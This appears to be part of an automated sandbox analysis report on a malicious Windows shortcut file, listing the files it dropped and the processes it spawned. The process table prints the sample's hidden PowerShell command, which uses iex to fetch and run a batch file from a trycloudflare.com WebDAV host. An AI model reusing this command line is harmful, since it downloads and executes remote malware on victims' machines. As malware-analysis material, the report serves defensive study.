Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
oSx8Pp4G8j.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has
command line arguments, Icon number=0, Archive, ctime=Mon Oct 28 21:04:21 2024, mtime=Mon Oct 28 21:04:21 2024, atime=Mon
Oct 28 21:04:21 2024, length=450560, window=hidenormalshowminimized
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc2td5lc.pgq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujzk1rwm.l1i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80ADMFM8FO600HA3U7QQ.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iex '& \\yang-not-basically-loading.trycloudflare.com@SSL\DavWWWRoot\new.bat'"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|